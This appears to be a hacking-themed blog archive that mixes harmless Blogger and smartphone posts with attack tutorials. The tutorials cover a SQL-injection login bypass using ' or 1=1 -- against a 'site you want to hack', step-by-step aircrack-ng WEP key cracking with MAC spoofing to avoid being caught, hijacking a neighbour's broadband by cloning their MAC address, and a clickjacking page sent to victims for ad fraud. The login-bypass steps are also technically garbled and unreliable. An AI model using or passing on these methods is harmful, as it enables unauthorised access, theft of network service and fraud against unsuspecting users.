Showing posts with label BD HACKER GROUP. Show all posts
Showing posts with label BD HACKER GROUP. Show all posts

how to disable copy paste in blogger

Usually how do we copy a content from a docs ? We would select the content we need to copy down and use short cut keys or Right click and Select copy. How about disable selecting text itself , then readers couldn't use shortcuts and even though they couldn't copy down using right click options.

So i recommend this method to bloggers who wish to protect their contents from content thieves.
Actually this script is free and very popular among website masters.

Lets go :
  1. Sign In to Blogger account and go to relevant blog.
  2. Go to Page Elements from Design  and Click on Add a Gadget and choose HTML/JAVASCRIPT from the gadgets.
  3. Now Copy down the popular code and Paste it on the selected Gadget and Save it.

  4. <!--Disable Copy And Paste-->
    <script language='JavaScript1.2'>
    function disableselect(e){
    return false
    }
    function reEnable(){
    return true
    }
    document.onselectstart=new Function ("return false")
    if (window.sidebar){
    document.onmousedown=disableselect
    document.onclick=reEnable
    }
    </script>
  5. Now refresh your Blog and Right Click on it. Done!

how to disable right click on blogger blog

how to disable right click on blogger blog

Disable right click function on blog is one of the best way to protect your blog content from content thieves.
Even Thieves couldn't save images in your blog.They will be displayed a status message that this function is disabled in this blog .You can customize the status message according to you.

Actually this script is free and very popular among website masters.

Lets  Start:

  1. Sign In to Blogger account and go to relevant blog.
  2. Go to  Edit HTML though  Design .
  3. Now Search fr Below Code.
  4. </head>
  5. Now Copy down the below code and Paste it before the Above code.
  6. <!--Disable Copy And Paste--> <script language='JavaScript1.2'> function disableselect(e){ return false } function reEnable(){ return true } document.onselectstart=new Function ("return false") if (window.sidebar){ document.onmousedown=disableselect document.onclick=reEnable } </script>
  7. Save the Template ,And  refresh your Blog and Right Click on it. Done!

How to Upload animated GIF image to blogger

 In fact many bloggers uses third party websites to upload animated (Gif format ) images to add in blog post. Blogger Image uploads are powered by picasa and it hasn't longer accepted animated images . 

Picasa says animated images are some PSD files are exception .
But today i have uploaded an animated image on picasa via blogger (Like , usual upload static images to blog post)  and works fine. 

Just check out Here. This is True !!!!!!





- Picasa web Album supports major image file formats.Click here to know  supported image formats .


Troubleshoot :
  • How To Upload Animated Image in Blogger ? 

                Just Like you upload Static Images to blog Post.

  • My Images aren't animating in Blog post.
               Ensure your image is in GIF format ( extension .gif) and animated before uploading to blog.

  • White Background for animated Images,which aren't before uploading to blog post.
               Make Transparent Image Show Up As Transparent In Blogger

  • Still doesn't animated, feel free to ask in Picasa Web forum.
  • Still, then sorry .Your animated file aren't supported by Picasa.Tryt Third party websites ( Like Photobucket,imgur ) to upload animated images and Get html code and paste in blog post (HTML mode) .

I successfully Uploaded animated GIF image in this post (created in Adobe Photoshop cs5 Extended ) .
What about You ? Comment on it.

Learn Google Webmaster Tools


Google webmaster tools are vital tool for bloggers who can index their status of blog in Google search results,update site maps,view statistics of GoogleBot, get list of broken links,errors  etc. Google webmaster tool can be used to customize your blogs search results in Google. For running a successful blog,you should know about all the tools available in Google webmaster.

Google itself providing many useful articles,videos and forums for webmasters and bloggers. Google needs quality website with quality SEO(Stay away from blackhats). For doing this job nicely, you have to be mastered with their tools.
Let me provide you some resources where you can learn more about Google Webmaster Tools.



  • Google Webmaster Tool YouTube Channel.
  1. WebmasterTool Help
  2.  Webmaster Academy 
I recommend you to subscribe this channel,because the head of Google web team, Matt will upload trendy videos which we wish to get answered.You will be updated about trends in Google search changes.
I strongly recommend this help resources.You must go through all the sub-links to get know about all the features and tools available in Google webmaster tool. This is the real source i personally used to know about how to use a tool.
If Google update their algorithms or any updates about Google searches will be posted firstly on this blog. So keep updated with every changes in Google world.

Google Official webmaster forum can be used to ask any doubts,errors and anything related to SEO and Google search results etc. Always remember that,search for your query and ensure that such questions are not repeated.
Third party, reputed website in web world which seriously post articles on SEO.
I didn't attended this course,but if you are still not able to use Google webmaster tool easily,you can attend this course. Remember it is paid course,So i don't recommend this one.


This is an official PDF file on "Google SEO Starter Guide" by Google.You must go through this article before your next blog post :) . It talks about real SEO but not related about learning about TOOLS in webmaster. But i felt this PDF will be very helpful for your SEO of blog.

Has your website or WordPress blog been hacked?

Is your site displaying the “This site may be hacked ” warning at Google.com or Bing.com?
Web site hacked or web site blocked by Google?
With over 15 years experience, and a long list of “verifiable” satisfied customer service testimonials, The Hack Repair Guy™ will remove malware, work to fix website security issues, recommend free techniques to monitor and prevent future attacks, install WordPress security plugins, and even repair basic WordPress errors; all for a reasonable flat rate, no matter how long it takes to resolve. Heroic Customer Service— it’s what we do! 

We clean most infected sites of malware within two hours and unblacklist websites within 24 hours. Why choose HackRepair.com?

  • Service
    We’ll discuss your situation by phone to determine how quickly we can repair your website.
  • Expedience
    We’ll clear your website of malicious scripts and malware then get your web site back up and running quickly. We are WordPress CMS experts as well.
  • Comprehensive
    We’ll help recover and unblock your site within Google and help you in clearing any Google.com or Bing.com website listing issues.
  • Education
    Our goal is to help prevent your website from being hacked again. We install security and security monitoring plugins, and will train you on how to use them free of charge as well.
  • And don’t forget our money back guarantee!


How can we guarantee we will clear & recover your hacked website?

video testimonial for hackrepair.com
  • We’ve been securing websites since 1997.
  • We have developed a range of tools to help quickly identify and clear malicious scripts or hacker code from your website pages.
  • Our friendly, knowledgeable staff is ready and available to assist you on your schedule.
  • We do not outsource our work; everything is done in-house here, in the USA.
  • We will work directly with Google on your behalf to ensure your website is unblocked within Google.com or Bing.com as quickly as possible.

Don’t let your reputation be ruined as a reported attack page. Call
(619) 479-6637 or toll-free (800) 639-6442, and let us help to repair your reputation immediately!



Other Common hack related terms and information relating to how to clear hacked websites:
  • iframe hack – sometimes called an iframe injection is often used by hackers to redirect visitors to other websites or force a software download upon visiting the hacked website.
  • Base64 code – is a common means hackers code their web page hacks. This obfuscated code makes it harder to find hacker code on a web page. A server admin searching a server for hack related text may often miss files injected with obfuscated base64 PHP code because the obfuscated code conceals the usual suspect phrases. The “pharma hack” often uses base64 or obfuscated coding.
  • Botnet – is a large collection of hacked PCs, sometimes called zombie computers. These PCs once controlled may be used to send junk e-mail or bring down web services. Botnet’s are often the means by which denial of service attacks are initiated.
  • ‘hacked by hacker’ – was a well known server wide compromise which took advantage of a vulnerability relating to the symbolic links setting within cPanel configured web servers. A number of web hosts fell prey to this cPanel related exploit, which allowed hackers to replace most of the “index” type pages of accounts configured on server with a text file containing the words, ‘hacked by hacker’.
  • Zero-Day exploit – Affecting both websites and computers, the zero-Day exploit is a term describing not yet documented security threats or vulnerabilities.
  • Denial of service attack – or distributed denial of service attack (DDoS), is a distributed attack on a network or service. Because these types of attacks originate from so many locations simultaneously they often result in hours of downtime until mitigated.
  •  
  • Common search engine and web browser alert messages include:
    Google – ‘This site may be hacked.’
    Google – ‘This site may harm your computer.’
    Google – ‘This site may harm your device’
    Google – ‘This site may be compromised’
    Bing and Twitter – ‘unsafe link’
    Chrome – ‘Warning: Something’s Not Right Here!’
    Chrome – ‘Danger: Malware Ahead!’
    Firefox – ‘Reported Attack Site!’
    Internet Explorer – ‘This website has been reported as unsafe’
    Opera – ‘Fraud Warning’
    Safari – ‘Warning: Visiting this site may harm your computer’
    Yahoo – ‘Warning: Hacking Risks’

How To Deface A Website With Basic HTML Coding In Just 5 Minute

I was browsing the net when i saw this tutorial:

Source: http://naijadudes.com


Steps:

Open the site you want to hack. Provide wrong username/password combination in its log in form. (e.g. : Username : me and Password: ' or 1=1 --)An error will occur saying wrong username-password. Now be prepared your experiment starts from here.


Right click anywhere on that error page =>> go to view source.

3. There you can see the HTML coding with JavaScript.• There you find somewhat like this....<_form action="...Login....">• Before this login information copy the URL of the site in which you are. (e.g. :"< _form..........action=http://www.targetwebsite.com/login.......>")

4. Then delete the JavaScript from the above that validates your information in the server.(Do this very carefully, your success to hack the site depends upon this i.e. how efficiently you delete the java scripts that validate your account information)

5.Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=text> “there instead of "<_type=password>". See there if maximum length of password is less than 11 then increase it to 11 (e.g. : if then write )

6. Just go to file => save as and save it anywhere in your hard disk with ext.html(e.g.: c:\chan.html)

7. Reopen your target web page by double clicking 'chan.html' file that you saved in your hard disk earlier.• You see that some changes in current page as compared to original One. Don't worry.

8. Provide any username [e.g.: hacker] and password [e.g.:' or 1=1 --] You have successfully cracked the above website and entered into the account of List user saved in the server's database.

Warnings

Do the coding and changes very carefully, your success to hack the site depends upon this i.e. how efficiently you delete the java scripts that validate your account information.

Please like this post if it worked for you

Hacking Wifi key using Backtrack

Wifi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections. Wifi has become an integral part of our lives today.

Right from Mobile Phones to Laptops to Ipads every device now has Wifi support.
Wifi is secured using a WPA protocol which intends to secure Wireless LANs like Wired LAN’s by encrypting data over radio waves, however, it has been found that WEP is not as secure as once believed. Now almost anyone can hack into a Wifi network by generating the valid WEP key using Bactrack. Read on to learn how ..

Disclaimer: This tutorial is given for educational purposes only and that for any misuse of this information, the blogger cannot be held liable.

SETTING UP THE CARD AND THE CONSOLE
Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -
* ifconfig
This is the Linux equivalent of ipconfig, you will see the network adapters in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.
* airmon-ng
This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range
* airmon-ng stop [Wi-Fi Card name(without the quotes)]
This command will stop the cards broadcast and reception immediately
* macchanger –mac [Desired MAC address] [Wi-Fi card name]
This command will change the current MAC address to any MAC address you desire, so that you don’t get caught later
* airmon-ng start [Wi-Fi Card name]
You will see another extra adapter that is set on monitor mode, use that adapter for all further purposes in the following commands where – ‘[Wi-Fi card name]’ appears
DUMPING PACKETS
Once you have set up all the parameters,you need to sniff and dump data packets in order to get the key.You can do so by using following commands. On the command console type these commands -
* airodump-ng [Wi-Fi card name]
Copy and paste the BSSID in the following command and execute it
* airodump-ng –c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]
As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (Click on Computer and you will see the file).The file will be present in two formats: *.cap, *.txt.
SPEEDING UP THINGS
However packet dumping is quite a slow process,we need to speed up things to save our time.Open a new console after the first data packet has been stored and type the command in the new console and execute it
*airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]
As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.
REVEALING WEP KEY
Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.
aircrack-ng –n 64 –b [BSSID] [Filename without the extension] Revealing the WEP Key -
As you type this command, you will see that a key will appear in front of you in the given below format:
XX:XX:XX:XX
It is not necessary that the key should have exactly the same digits as shown above so please don’t freak out if you see a 10 digit or 14 digit key. Also if the decryption fails, you can change the bit level of the decryption in the command:
aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]
Remember, the bit level should be a number of 2n where n:1,2,3,4…
e.g.
aircrack-ng –n 32 –b [BSSID] [Filename without the extension]
OR
aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.
Now just login using the WEP key you got.

Developing native Apps for Jailbreaked Windows Phone

Windows Phone loaded with Windows OS like Windows Phone 7, Windows Phone 7.5, Windows Phone 7.8, Windows Phone 8 and lately if news sources are to be believed then even Windows Phone 8.1 is also on cards.

One thing for which Microsoft should be appreciated is the security & stability of the OS of Mobile Phone, When compared with Android it is much much secure OS and is on par with Apple iOS in terms of Security.
But adding security had imposed lot of restrictions and thus you wont find much applications as compared to Android & iPhone on Windows Store.

You will never find applications like Task Manger where you have flexibility to see which applications are running on phone, what amount of memory are they using which you can easily do it in even the cheapest of android phones. So here is the idea by which developers can develop applications which would have not been possible with Microsoft's restriction.

So as to develop a native application thus utilizing the core features which are currently available to OEMs, you need to jailbreak your windows phone.

Now what is Jail-breaking? Just visit here to find out what exactly Jailbreaking is and how to Jailbreak your Windows Phone. Once you have your phone jailbreaked, follow the below procedure to develop native application and enrich you applications with native functionality.

      1.    Download the DLL Import Project from the below link
     http://forum.xda-developers.com/showthread.php?t=1006331

    2.    The DLL Import Project contains compiled DLLs, with which you can access to those API which are not provided or accessible in non-jailbreak windows Phone 7

The following steps were followed while creating a new application taking reference of DLL Import project for CPU and Memory Analysis Tool:


       - Follow the normal procedure of creating a new Windows Phone 8/7.1 project on Visual Studio 2012.

       - When the project has been made, go to the Solution Explorer bar and right click on the project name.


       - Since the DLLs contains Native Code, Visual Studio will not allow you to add the DLL via Add references, so instead we have a workaround as follow


       -  Go to Add > Existing Item.


     - Doing this, navigate to the folder containing the respective DLLs you need to add for the project.


      - In that folder, select the respective DLLs and click open. The DLLs will be added.


     - For the Memory CPU Tool, the DLLs added were

                           DllImportMango.dll
                           Microsoft.Phone.InteropServices.dll
                           Microsoft.Live.dll
                           Microsoft.Phone.Controls.Toolkit.dll
                           Microsoft.Live.Controls.dll
                           AmCharts.Windows.QuickCharts.WP.dll.

     - After adding all the DLLs the main step is to set their properties.


    - Right click on each DLL name and go to Properties.


   - In properties the Build Action should be set to Content and Copy to Output Directory should be set to Copy Always.


    - This step should be done for all the DLLs.


    - Now go to the Solution Explorer and expand Properties.


    - Right click on WMAppManifest.xml and go to Properties.


   - Here also the Build Action should be set to Content and Copy to Output Directory should be set to Copy Always.


   - Now open the project in the file explorer and go to the folder named Properties.


   - In this folder edit the WMAppManifest.xml in the notepad. It should contain the following capabilities:

ID_CAP_GAMERSERVICES
ID_CAP_IDENTITY_DEVICE
ID_CAP_IDENTITY_USER
ID_CAP_LOCATION
ID_CAP_MEDIALIB
ID_CAP_MICROPHONE
ID_CAP_NETWORKING
ID_CAP_PHONEDIALER
ID_CAP_PUSH_NOTIFICATION
ID_CAP_SENSORS
ID_CAP_WEBBROWSERCOMPONENT
ID_CAP_NETWORKING_ADMIN
ID_CAP_INTEROPSERVICES
ID_CAP_RINGTONE_ADD
      - Now go to the solution explorer and right click on References and click on Add Reference.

      - Check mark the respective references required for the project.

      - In this project, the references used were:

Microsoft.Devices.Sensors
Microsoft.Phone
Microsoft.Phone.Interop
Microsoft.Xna.Framework
Microsoft.Xna.Framework.Game
mscorlib
mscorlib.Extensions
System
System.Core
System.Net
System.Windows
System.Xml
System.Xml.Linq


Above mentioned are all the points which should be kept in mind while creating a new application based on DLL Imports in Windows Phone 8/7.1
This is the procedure to use already available DLLs and access those APIS which DLL Import project has exposed.
In case you want to use/add/modify the APIs and create your new DLL. It is possible by following procedure.
1.      Install the following software
a.      Visual Studio 2008 SP1
b.      Windows Mobile SDK 6 PRO
2.      Now open the Solution which is there inside VS2008 folder of CSharp DLL Import Project which you have downloaded earlier.
3.      Once you open the solution you can easily modify/add the APIs which are available in Windows Mobile 6, compile the solution and get the respective DLL.
4.      Now you can use the newly made DLL by Add Existing Item and following the above procedure in you windows phone 7 projects which will run properly on Jailbreak Windows Phone 7.

Fake Antivirus Software which themselves are viruses - Beware!

Guys in this world of advanced digitalization, it is very necessary to be safe from various network threats like Viruses, Trojans, Malwares, Spywares, etc…

Generally the user is not having much advanced knowledge to how to stay secure in this world of WWW. So he generally uses one or the other antivirus programs which in turn keeps monitor on the system to stay the user safe.



What is Antivirus and how does it works?




Antivirus is a software program which is built to monitor the user system for all the known threats. That means it has a database of all the known threats, when your system comes across any of such threats it protects you as it has ability to resolve the treat or if not possible to clean at least it can stop the threat to attack the user system.

Again it can protect you with all the threats which are known to the software company whose antivirus you are using. All the antiviruses keep on updating their virus definition database as soon as they come across any such threats.



You can read this link about my review of best antivirus for your system so as to be safe from virus attacks

But do you know, you, me or anyone with some programming skills can create a new virus, which in turn won’t be detected by the Antivirus. Why? Because that virus is still unknown to the Antivirus company. It takes some time to the company to identify the threat and release the updates. Whereas the user unaware of this entire thing thinks that he is totally protected from the viruses and various other threats.

So it’s good to have an antivirus software installed in your system, but it is also required that you stay alert to avoid unnecessary security issues in your system.


Let me tell you some of the Virus Programs, which claim that they are Antiviruses. So Next time you come across such situation, stay alert! Your Information security could be in danger.


Have you ever came across a situation in which you are surfing a website, any random website of news, blogs or whatever and you get a message that “Your PC contains virus, click here to scan for free”

Free… When the user read this word free, he just clicks on that application and that application will scan your system and tell you that you 400+ errors/viruses and, you need to purchase to the full version to fix the problem.

The problem doesn’t end here. Even if you decide to not to buy the software, you won’t be able to uninstall the demo application which you installed to scan your PC. Many applications which were working perfectly fine before installing this so called Virus scanner, now doesn’t work. Your PC started giving you error message and your PC starting crashing every now and then. 

 
This is not because of the viruses the antivirus program which you downloaded from internet reported you. It is that same program which is the reason behind the error messages, frequent crashes. This is just a marketing skill. Once you start facing such issue, you feel that the PC is infected with virus and you buy that fake antivirus by paying large amount of money.

So next time when you are buying any new antivirus, it is always advisable that you take advice of some expert person and also never ever use any of the online scanner, antivirus tools claiming that you have virus in your PC. They are nothing but fake malwares.

Let me show you some of the most famous Malware or fake antivirus which claims to be best antivirus programs.Most famous and the one which tops the list is Rouge Scanner.
 
This scanner is available on many torrent sites, free download sites. It claims itself as free online scanner and antivirus program. Which on scanning will give you lot of fake virus alerts and to fix this issue you have to buy the full version.

  1. Rouge Scanner is available on internet with various names such as MS Antivirus / WinPC Defender

Names are very much similar to the security application of Windows, that is Windows Defender and generally MS is used as a short form for Microsoft. But be aware there are fake antivirus programs. Just using such names to disguise the users and to prove it that it is an authentic Antivirus program.

Once installed this software, you won’t be able to uninstall the software and even your antivirus on most cases doesn’t warn you for this kind of fake antiviruses.
 2. Security Tool
Another such fake antivirus program is Security tool also known as Total security. It displays the security alert which is exactly similar to one’s which appear in windows defender for Vista and Windows 7. Screen similar to Windows Security alert can disguise anyone and can fall in to the trap of fake antiviruses.

It eliminates the icons from desktop, slowdowns the system, disables Task manager, corrupts the Registry, etc…

3. Internet Security 2010

The name is similar to one of the most famous and prestigious antivirus software i.e. Norton Internet Security, but always have a keen eye and be aware that this is a fake antivirus program.

Also known as IS2010, after installation blocks YouTube, Facebook and many more important website’s access and thus forcing user to buy the full version by paying hefty amount of money. It displays many fake error messages saying that all your data will be corrupted and so on making user forcibly buying the full version of this fake antivirus program.

URL:-http://virus.geeksailor.com/how-to-uninstall-remove-internet-security-2010-virus-removal-guide/
4. Anti-Malware Defender
 
This fake antivirus/spyware is often disguised as a Windows Defender from Microsoft. It is almost impossible to distinguish between the original windows defender screen and with this fake anti-malware defender screen.

This fake antivirus will block up your browser and constantly keeps on showing fake virus alert messages.

URL:- http://www.2-spyware.com/remove-antimalware-defender.html 
5.    User Protection

Again one of the famous fake antivirus programs, it propagates through fake video codec’s manipulated to any website which display videos streaming such as YouTube. When you try to view the video in the browser it will ask you that the plugin is missing. Once you click on install plugin, along with the codec this fake malware get installed in the user system.

This fake application has ability to block your applications from running it properly; it could also result in system crashes.

URL:-http://www.spywarevoid.com/remove-user-protection-userprotection-removal-help.html

This list is never ending and it keeps on changing their names and their functionality of working from time to time. The main thing to keep in mind is never trust any application from internet until and unless you are totally downloading from trustworthy websites.

Also never accepts any such error message which claims that your PC is infected with virus or so. Never use any such application which claims that by fixing your registry it can speed up your computer. All those applications are mere marketing skills to earn money by faking people.

XOLO A500S Detailed Review

Enough of Apple,Samsung,Nokia etc, you need not have to spend  always some handsome money to have  gadget with latest configuration. Today we are going to review the A500S from XOLO. If you want to buy smartphone and have budget constraint here it is the smartphone from XOLO, A500S within 6k.

I am using this phone from 2 months and it’s great, here is very brief review on key specifications, which can help you to decide whether this is the smartphone which you want to buy.
Feature
Verdict
Processor
MT 6572W
1.3 GHz Dual Core Processor
Enough of processing speed to support routine tasks.
 You can enjoy your favorite songs while chatting on whats app with your friends and do lots of other things simultaneously with smooth and fast processing.
Though it breaths hard when you try to overload it.
Good for mid level usage.
Camera
Rear cam:  5 MP
Front cam: VGA
Front camera quality is very poor.
Flash quality is pathetic, providing such flash doesn’t make sense.
5MP pic quality is decent though we can’t compare it with SONY or SAMSUNG smartphone camera.
You can enjoy video calling with this phone under 6k which is rare.
Memory
Internal memory  - 4GB
RAM                       - 512
Expandable           - up to 32GB         
Actual usable internal storage is only 1.2 GB. So it is required to have memory card if you have lots data to be stored in phone.
RAM is ok for the mid level usage.
Screen and Build
 4 inches
Classy and delicate look.
Good screen resolution and size to view videos and play games.
Look and feel is classy.
One can always get confuse this phone with sony xperia by look.
Very delicate, need to have the good quality cover to protect the phone from damage.
Extremely light weight.
Operating System
Android V4.2 Jelly Bean
Latest and best.
Though they have tried to customize the look but it’s not that much fascinating.
 Some basic feature icons (like messaging, calculator) sometimes give look of china phones.
Given choice to the user for selecting some customized XOLO themes.
XOLO Secure app is provided to protect the phone in case of loss by tracking and to take backup of data.
Audio
Audio quality is good and decent.
Loudspeaker volume is good.
Battery
  1400 mAh
Battery backup is little less, though provided with power app for optimal battery usage and monitoring.
Price
6999/- Official
You can get it within 6000/- on online purchase.
Best buy at this price.
 Final Verdict:
This is the best configuration one can get within 6k. Best look and performance. Those who don’t bother about brand and have budget constraint can go with this smartphone definitely.

Hack Your BroadBand !! RISK FREE !!

DownloaD The Ip Scanner !
First Go to this Site www.angryziber.com

Then Go To www.whatismyip.com
Get Your Ip Address !!


Then Scan Ip From 1-255 Range
You will find Some Computers ..
Then Just Copy their Ip Address,Mac Address And Computer Name
Then when they Go Offline use there Mac address via changing it with Kmac or MAC Address Changer v4.7

Rename your Computer n Workgroup

Then Restart Your Computer ..
Done !!
Note:When you are Changing IP please Unplug the Cable

Softwares Needed ..
MAC Address Changer 4.7
http://www.download.com/Technitium-MAC-Address-Changer/3000-2085-10554920.html?part=dl-Technitiu&subj=uo&tag=button

Kmac
http://www.neset.com/download/?k-mac.zip

How to do ClickJacking Attack?


What is click jacking?
Clickjacking is the process of hijacking a user's click in a web browser and redirect it to do an entirely different action than desired by the user naturally. The way this is done is by creating a visual illusion i-e victim is fooled in another way, where the user is not able to see the real item he is clicking, instead he is made to believe that he clicking something entirely different. 

A hacker accomplishes this by creating a transparent iframe which contains the target page
in which there is an item he wants the victim to click (like cookies stealer script, phishing page etc). He then embeds this iframe into a malicious page controlled by him. When a user visits this malicious page, the hacker makes the iframe always hover under the user's mouse. As the iframe is transparent the user is never able to see it and thus clicks on one of the items in the malicious page. This click actually happens on the target item, in the target page. Thus the user is tricked into clicking something he never meant to.
 

Also used for earning purpose:

Some people embed ads hidden in front page, or behind a hot spot so that according to viewer he is clicking the hot spot but infact he is clicking ads behind it. This is also the use of two layers at a time. See example below you will know what i am saying, the purpose of HT is to share new information readily.

Example:




Now, if transparency is vanished by hackers, then you might not know what you are clicking, and thats the base for click jacking.

How its done:
Its bit difficult for me to explain, LOL, but lets give a try, First of all download the script below:

Download Script(Click me)

Modifying the script to work,
Now, in the orignal script the url below the first layer as shown in the video is www.hackersthirst.com,
on taking the mouse over you won't see hackersthirst.com beacuse opacity is "0" and i have vanished opacity. Now, how to change the opacity,In orignal case the script is like below(as you downloaded):

So, opacity is zero (You have to play with the onmouseover opacity don't play with onmouseout), Inorder to see what is behind the first layer then change opacity value from "0" to ".5" like this:
Now, open the script after saving it in browser, and just like in video hover over mouse and you will see sublayer behind.

After this set the html image, script , url , ads after the first layer, I have used hackersthirst.com as the secondary layer, inorder to change it edit the script again and find www.hackersthirst.com as shown in pic:
now, change it to any external page, and embed ads and anything in that external page, Change the opacity back to "0" , and send it to victim now if he opens then victim will actually clicking first layer but infact action is taken in the second layer. So, we are making use of illusion.

So, thats it Share to friends to make them safe from such attacks. A PPC script was made by hacker but its copies were provided to 7 people only.That was for ads clickjacking purpose. - See more at: http://www.hackersthirst.com/2011/01/how-to-do-clickjacking-attack-video.html#sthash.nMjWohk7.dpuf